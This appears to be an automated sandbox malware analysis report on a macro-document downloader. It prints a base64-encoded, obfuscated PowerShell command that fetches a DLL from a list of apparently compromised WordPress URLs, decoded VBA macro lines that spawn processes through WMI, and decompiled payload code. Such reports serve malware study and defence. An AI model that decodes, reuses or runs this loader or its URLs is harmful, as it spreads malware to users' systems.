IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArACgAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgAn

                                            Ij2hesgjee57d3s0

                                            uVItICICB

                                            CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                            CreateTextFile

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            anyPG

                                            Close

                                            YVZXECEHD

                                            StringsDecrypted Strings
                                            "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                            "NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs"
                                            "CcDmClHsnCC"
                                            "aqGiHISIbAoabV"
                                            "nJJzFRjEWpRikxCD"
                                            "]a""nw[3"
                                            "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                            "QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD"
                                            "syYTHJShrguhzb"
                                            "TubioGUTLadgXbA"
                                            "oLweAMoGsqVE"
                                            LineInstructionMeta Information
                                            263

                                            Function Hrs2a1p95u19(Svk60sycz63sk)

                                            264

                                            Q491417n8n1 = Pg5minli2d3c9

                                            Pg5minli2d3c9

                                            executed
                                            265

                                            Goto uWZkeMFv

                                            266

                                            Dim zDsRaIBGF as Object

                                            267

                                            Set ViWsSIH = sreXHFD

                                            sreXHFD

                                            268

                                            Set zDsRaIBGF = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                            CreateObject

                                            269

                                            Dim uWZkeMFv as Object

                                            270

                                            Set uWZkeMFv = zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")

                                            CreateTextFile

                                            271

                                            uWZkeMFv.WriteLine "CcDmClHsnCC"

                                            WriteLine

                                            272

                                            uWZkeMFv.WriteLine "aqGiHISIbAoabV"

                                            WriteLine

                                            273

                                            uWZkeMFv.WriteLine "nJJzFRjEWpRikxCD"

                                            WriteLine

                                            274

                                            Set QOrvJEB = eCIzUDyJ

                                            eCIzUDyJ

                                            275

                                            uWZkeMFv.Close

                                            Close

                                            276

                                            Set zDsRaIBGF = Nothing

                                            277

                                            Set UskmBJF = yJmmmVIAG

                                            yJmmmVIAG

                                            278

                                            Set uWZkeMFv = Nothing

                                            278

                                            uWZkeMFv:

                                            280

                                            Hrs2a1p95u19 = Replace(Svk60sycz63sk, "]a" + "nw[3", Ij2hesgjee57d3s0)

                                            Replace("w]anw[3in]anw[3m]anw[3gm]anw[3t]anw[3]anw[3]anw[3]anw[3s]anw[3]anw[3]anw[3:w]anw[3]anw[3in]anw[33]anw[32]anw[3_]anw[3]anw[3p]anw[3]anw[3ro]anw[3]anw[3ce]anw[3s]anw[3s]anw[3]anw[3","]anw[3",) -> winmgmts:win32_process

                                            Ij2hesgjee57d3s0

                                            executed
                                            281

                                            Goto iHKuDmaEr

                                            282

                                            Dim OMZxxg as Object

                                            283

                                            Set drZcHkCm = uVItICICB

                                            uVItICICB

                                            284

                                            Set OMZxxg = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                            CreateObject

                                            285

                                            Dim iHKuDmaEr as Object

                                            286

                                            Set iHKuDmaEr = OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")

                                            CreateTextFile

                                            287

                                            iHKuDmaEr.WriteLine "syYTHJShrguhzb"

                                            WriteLine

                                            288

                                            iHKuDmaEr.WriteLine "TubioGUTLadgXbA"

                                            WriteLine

                                            289

                                            iHKuDmaEr.WriteLine "oLweAMoGsqVE"

                                            WriteLine

                                            290

                                            Set noebIvSiu = anyPG

                                            anyPG

                                            291

                                            iHKuDmaEr.Close

                                            Close

                                            292

                                            Set OMZxxg = Nothing

                                            293

                                            Set NXbmIuHX = YVZXECEHD

                                            YVZXECEHD

                                            294

                                            Set iHKuDmaEr = Nothing

                                            294

                                            iHKuDmaEr:

                                            296

                                            End Function

                                            Module: Zdjtk46nm17voo

                                            Declaration
                                            LineContent
                                            1

                                            Attribute VB_Name = "Zdjtk46nm17voo"

                                            Reset < >

                                              Analysis Process: powershell.exe PID: 2544 Parent PID: 1604 powershell.exeCOMMON

                                              Executed Functions

                                              Function 000007FF00260923, Relevance: .1, Instructions: 126COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2123071389.000007FF00260000.00000040.00000001.sdmp, Offset: 000007FF00260000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: efd2759c98cf131e9a29fa20f50551820d3bcb8f44967cbb5ad3f625a39ce8aa
                                              • Instruction ID: 0767a89451e4480503773bc507aa25507c46146a89e6a224fefc7f9b43c5b611
                                              • Opcode Fuzzy Hash: efd2759c98cf131e9a29fa20f50551820d3bcb8f44967cbb5ad3f625a39ce8aa
                                              • Instruction Fuzzy Hash: BA31002091E7C28FE7579B385CB52A07FB0AF17201B0A04EBD0C4CF1B3DA18599AD722
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 000007FF0026249A, Relevance: .0, Instructions: 31COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2123071389.000007FF00260000.00000040.00000001.sdmp, Offset: 000007FF00260000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 459832aa87b14f07334aba52be976b5f4175cd4db572fcdb56d5f3d632686b55
                                              • Instruction ID: f628f3c2659fa51ee64a7b317d981fb46f36e00cfacf97101e60185bd45ce1dc
                                              • Opcode Fuzzy Hash: 459832aa87b14f07334aba52be976b5f4175cd4db572fcdb56d5f3d632686b55
                                              • Instruction Fuzzy Hash: CBE0D810B1DC0B4FFB94666C680A3B473C1E754353F600076E80CC22A3DD1AD9448381
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Analysis Process: rundll32.exe PID: 2724 Parent PID: 2808 rundll32.exeCOMMON

                                              Executed Functions

                                              Function 00222C63, Relevance: 56.1, Strings: 44, Instructions: 1125COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 97%
                                              			E00222C63() {
				char _v68;
				signed int _v72;
				char _v80;
				char _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _v112;
				signed int _v116;
				char _v124;
				char _v132;
				char _v140;
				char _v144;
				signed int _v148;
				void* _v152;
				void* _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				unsigned int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				unsigned int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				unsigned int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				unsigned int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				unsigned int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				unsigned int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				unsigned int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				unsigned int _v576;
				signed int _v580;
				signed int _v584;
				unsigned int _v588;
				signed int _v592;
				unsigned int _v596;
				signed int _v600;
				signed int _t1135;
				signed int _t1138;
				signed int _t1140;
				signed int _t1144;
				signed int _t1172;
				void* _t1186;
				signed int _t1199;
				void* _t1213;
				signed int _t1218;
				signed int _t1224;
				signed int _t1257;
				signed int _t1336;
				signed int _t1340;
				signed int _t1348;
				signed int _t1351;
				signed int _t1352;
				signed int _t1353;
				signed int _t1354;
				signed int _t1355;
				signed int _t1356;
				signed int _t1357;
				signed int _t1358;
				signed int _t1359;
				signed int _t1360;
				signed int _t1361;
				signed int _t1362;
				signed int _t1363;
				signed int _t1364;
				signed int _t1365;
				signed int _t1366;
				signed int _t1367;
				signed int _t1368;
				signed int _t1369;
				signed int _t1370;
				signed int _t1371;
				signed int _t1372;
				void* _t1384;
				signed int _t1385;
				void* _t1387;
				void* _t1389;
				void* _t1391;
				void* _t1392;
				void* _t1393;

				_t1387 = (_t1385 & 0xfffffff8) - 0x258;
				_v596 = 0x54d1;
				_t1225 = 0x2a32d0a;
				_t1351 = 0x66;
				_v596 = _v596 / _t1351;
				_t1352 = 0x6b;
				_v596 = _v596 / _t1352;
				_v596 = _v596 >> 4;
				_v596 = _v596 ^ 0x00002830;
				_v416 = 0xcdcb;
				_v416 = _v416 + 0x2116;
				_t1353 = 0x1f;
				_v416 = _v416 * 0x30;
				_v416 = _v416 ^ 0x002c9323;
				_v488 = 0x9982;
				_v488 = _v488 | 0x10c88477;
				_v488 = _v488 ^ 0xa41c88c2;
				_v488 = _v488 / _t1353;
				_v488 = _v488 ^ 0x05d51165;
				_v496 = 0x77c8;
				_v496 = _v496 >> 3;
				_t1354 = 0xa;
				_v496 = _v496 / _t1354;
				_v496 = _v496 << 7;
				_v496 = _v496 ^ 0x0000cb31;
				_v232 = 0x48c9;
				_v232 = _v232 << 0xe;
				_v232 = _v232 ^ 0x12321472;
				_v360 = 0x3c3d;
				_t1218 = 5;
				_v360 = _v360 / _t1218;
				_v360 = _v360 * 0x2f;
				_v360 = _v360 ^ 0x000268e3;
				_v176 = 0x1856;
				_v176 = _v176 * 0x70;
				_v176 = _v176 ^ 0x000ab2a8;
				_v264 = 0xa86e;
				_v264 = _v264 + 0xffff13b3;
				_v264 = _v264 ^ 0xffffefbf;
				_v376 = 0x5423;
				_v376 = _v376 + 0xffffd432;
				_v376 = _v376 | 0x32249576;
				_v376 = _v376 ^ 0x3224c778;
				_v248 = 0xe66f;
				_v248 = _v248 >> 9;
				_v248 = _v248 ^ 0x000023ba;
				_v308 = 0x205b;
				_v308 = _v308 + 0xffff1f5e;
				_v308 = _v308 << 8;
				_v308 = _v308 ^ 0xff3fb884;
				_v484 = 0x592;
				_v484 = _v484 + 0xffffd519;
				_v484 = _v484 | 0x759ff25f;
				_v484 = _v484 + 0x87eb;
				_v484 = _v484 ^ 0x00008574;
				_v168 = 0x6ddb;
				_v168 = _v168 | 0x6e943d07;
				_v168 = _v168 ^ 0x6e944d9a;
				_v200 = 0xd6b0;
				_v200 = _v200 + 0xffff46fa;
				_v200 = _v200 ^ 0x00002650;
				_v452 = 0x246b;
				_v452 = _v452 ^ 0x586b7630;
				_v452 = _v452 << 0xc;
				_v452 = _v452 + 0xd57e;
				_v452 = _v452 ^ 0xb526cd97;
				_v348 = 0xfa69;
				_t1340 = 0x52;
				_t1355 = 0x65;
				_v348 = _v348 * 0x65;
				_v348 = _v348 | 0xab757825;
				_v348 = _v348 ^ 0xab77a96f;
				_v324 = 0xa741;
				_v324 = _v324 ^ 0x4f747397;
				_v324 = _v324 / _t1340;
				_v324 = _v324 ^ 0x00f83cd8;
				_v296 = 0x788d;
				_v296 = _v296 ^ 0x0ef2968d;
				_v296 = _v296 ^ 0x495ddb9a;
				_v296 = _v296 ^ 0x47af2616;
				_v220 = 0xb89f;
				_v220 = _v220 >> 0xb;
				_v220 = _v220 ^ 0x000056af;
				_v520 = 0x12ce;
				_v520 = _v520 + 0xe747;
				_v520 = _v520 << 7;
				_v520 = _v520 | 0x5b07959e;
				_v520 = _v520 ^ 0x5b7fa869;
				_v208 = 0xa95c;
				_v208 = _v208 + 0xffff5ee2;
				_v208 = _v208 ^ 0x00000a9e;
				_v172 = 0xa2eb;
				_v172 = _v172 * 0x79;
				_v172 = _v172 ^ 0x004d63d4;
				_v180 = 0x98a7;
				_v180 = _v180 | 0x8ae8094c;
				_v180 = _v180 ^ 0x8ae8e600;
				_v424 = 0xd5a0;
				_v424 = _v424 << 5;
				_v424 = _v424 / _t1355;
				_v424 = _v424 ^ 0x00007145;
				_v392 = 0x548d;
				_v392 = _v392 + 0xffff9ec2;
				_v392 = _v392 + 0xffffa1fb;
				_v392 = _v392 ^ 0xffff9dba;
				_v340 = 0x6e45;
				_t1356 = 0x16;
				_v340 = _v340 / _t1356;
				_v340 = _v340 + 0xffff4bce;
				_v340 = _v340 ^ 0xffff3c02;
				_v536 = 0xbde4;
				_v536 = _v536 * 0x7f;
				_v536 = _v536 ^ 0x574a5eba;
				_v536 = _v536 << 0xd;
				_v536 = _v536 ^ 0x8d54c30e;
				_v284 = 0x7ef6;
				_v284 = _v284 + 0x9ef0;
				_v284 = _v284 ^ 0x00015c31;
				_v408 = 0xc211;
				_v408 = _v408 ^ 0x3543d7c0;
				_v408 = _v408 * 0x2b;
				_v408 = _v408 ^ 0xf244fbb0;
				_v588 = 0x856b;
				_v588 = _v588 ^ 0xfc1cd259;
				_v588 = _v588 ^ 0x7d294751;
				_v588 = _v588 >> 0xe;
				_v588 = _v588 ^ 0x000240de;
				_v508 = 0x646a;
				_t1357 = 0x1e;
				_v508 = _v508 / _t1357;
				_t1358 = 0x35;
				_v508 = _v508 / _t1358;
				_v508 = _v508 * 0x5a;
				_v508 = _v508 ^ 0x00003cc0;
				_v472 = 0x196b;
				_v472 = _v472 * 0x16;
				_v472 = _v472 + 0x8cdc;
				_v472 = _v472 ^ 0x6344539c;
				_v472 = _v472 ^ 0x6346dd33;
				_v212 = 0xb705;
				_v212 = _v212 << 7;
				_v212 = _v212 ^ 0x005bff43;
				_v312 = 0xb48f;
				_v312 = _v312 + 0xffff701f;
				_v312 = _v312 >> 0xa;
				_v312 = _v312 ^ 0x00001302;
				_v480 = 0xed6e;
				_v480 = _v480 | 0x6be3eced;
				_v480 = _v480 + 0x4979;
				_v480 = _v480 ^ 0x6be47f6f;
				_v204 = 0xd35b;
				_v204 = _v204 >> 8;
				_v204 = _v204 ^ 0x00000622;
				_v456 = 0xd2fa;
				_v456 = _v456 << 3;
				_v456 = _v456 + 0xffffd4b1;
				_v456 = _v456 << 4;
				_v456 = _v456 ^ 0x0066f5d7;
				_v464 = 0x5ee1;
				_v464 = _v464 >> 9;
				_v464 = _v464 | 0xf1defbea;
				_v464 = _v464 ^ 0xf1de88d3;
				_v304 = 0x5962;
				_v304 = _v304 ^ 0xf5db8de9;
				_v304 = _v304 | 0xcdcbde78;
				_v304 = _v304 ^ 0xfddba732;
				_v196 = 0xf258;
				_v196 = _v196 << 7;
				_v196 = _v196 ^ 0x007971a7;
				_v448 = 0xfcbd;
				_v448 = _v448 | 0x39b7afc5;
				_v448 = _v448 * 0x70;
				_v448 = _v448 | 0x0e40c0bc;
				_v448 = _v448 ^ 0x4e7fac25;
				_v412 = 0x82bf;
				_v412 = _v412 | 0xb02f6e2d;
				_v412 = _v412 + 0xffff8626;
				_v412 = _v412 ^ 0xb02f1cac;
				_v396 = 0xa4bf;
				_v396 = _v396 ^ 0xb063c23f;
				_v396 = _v396 >> 0xf;
				_v396 = _v396 ^ 0x00011327;
				_v592 = 0x3de9;
				_v592 = _v592 + 0xffff189b;
				_v592 = _v592 * 0x3e;
				_v592 = _v592 + 0xffff8de2;
				_v592 = _v592 ^ 0xffd6d64a;
				_v404 = 0x86b0;
				_v404 = _v404 >> 5;
				_v404 = _v404 | 0x66bae114;
				_v404 = _v404 ^ 0x66bacebe;
				_v268 = 0x5937;
				_v268 = _v268 + 0xb57c;
				_v268 = _v268 ^ 0x00015145;
				_v280 = 0x9a1f;
				_v280 = _v280 + 0xffffa2eb;
				_v280 = _v280 ^ 0x000041dd;
				_v572 = 0xebd0;
				_v572 = _v572 ^ 0xedb0bf00;
				_t1359 = 0x32;
				_v572 = _v572 / _t1359;
				_v572 = _v572 << 1;
				_v572 = _v572 ^ 0x09819433;
				_v468 = 0x3364;
				_v468 = _v468 + 0xffff353c;
				_v468 = _v468 + 0x9f63;
				_v468 = _v468 | 0x0336228b;
				_v468 = _v468 ^ 0x0336362e;
				_v580 = 0x8c54;
				_v580 = _v580 | 0xf7fe7ffd;
				_v580 = _v580 << 2;
				_v580 = _v580 ^ 0xdffb9211;
				_v400 = 0xc44;
				_v400 = _v400 | 0x703220aa;
				_v400 = _v400 + 0x556b;
				_v400 = _v400 ^ 0x70328daf;
				_v316 = 0xc625;
				_t1360 = 0x2f;
				_v316 = _v316 / _t1360;
				_v316 = _v316 | 0xad0f9139;
				_v316 = _v316 ^ 0xad0f9a77;
				_v352 = 0x3bfc;
				_v352 = _v352 ^ 0x3d91e4fd;
				_v352 = _v352 << 4;
				_v352 = _v352 ^ 0xd91d9102;
				_v188 = 0xbf9d;
				_v188 = _v188 ^ 0xeb169de8;
				_v188 = _v188 ^ 0xeb160ae0;
				_v272 = 0xf610;
				_v272 = _v272 >> 0xc;
				_v272 = _v272 ^ 0x000001f5;
				_v500 = 0xa952;
				_v500 = _v500 ^ 0x762f8db9;
				_t1361 = 0x7b;
				_v500 = _v500 * 0x6e;
				_v500 = _v500 | 0x4a766c6e;
				_v500 = _v500 ^ 0xca77b322;
				_v420 = 0xb3ce;
				_v420 = _v420 | 0x5d2bbb9b;
				_v420 = _v420 + 0x97cf;
				_v420 = _v420 ^ 0x5d2c523b;
				_v276 = 0x9f6f;
				_v276 = _v276 + 0x6bc4;
				_v276 = _v276 ^ 0x00010aa4;
				_v504 = 0x2102;
				_v504 = _v504 >> 7;
				_v504 = _v504 + 0xffff0b4b;
				_v504 = _v504 << 4;
				_v504 = _v504 ^ 0xfff0cd66;
				_v320 = 0xeb7e;
				_v320 = _v320 / _t1361;
				_v320 = _v320 << 0xc;
				_v320 = _v320 ^ 0x001ed973;
				_v512 = 0x61aa;
				_v512 = _v512 | 0xfdc9feff;
				_t1362 = 0x42;
				_v512 = _v512 / _t1362;
				_v512 = _v512 ^ 0x03d81aae;
				_v540 = 0x929f;
				_t1363 = 3;
				_v540 = _v540 * 0x59;
				_v540 = _v540 ^ 0xd582cfd5;
				_v540 = _v540 + 0xffff6c6f;
				_v540 = _v540 ^ 0xd5af900c;
				_v332 = 0xd4e0;
				_v332 = _v332 | 0xf04e42e2;
				_v332 = _v332 ^ 0xcda3b68f;
				_v332 = _v332 ^ 0x3ded4bfa;
				_v192 = 0xb136;
				_v192 = _v192 >> 6;
				_v192 = _v192 ^ 0x00000257;
				_v460 = 0xb4b8;
				_v460 = _v460 + 0xffff8599;
				_v460 = _v460 / _t1363;
				_v460 = _v460 + 0x6faa;
				_v460 = _v460 ^ 0x0000d8b1;
				_v548 = 0x6ab8;
				_t1364 = 0x7c;
				_v548 = _v548 * 0x71;
				_v548 = _v548 / _t1364;
				_v548 = _v548 << 4;
				_v548 = _v548 ^ 0x00063121;
				_v260 = 0x579;
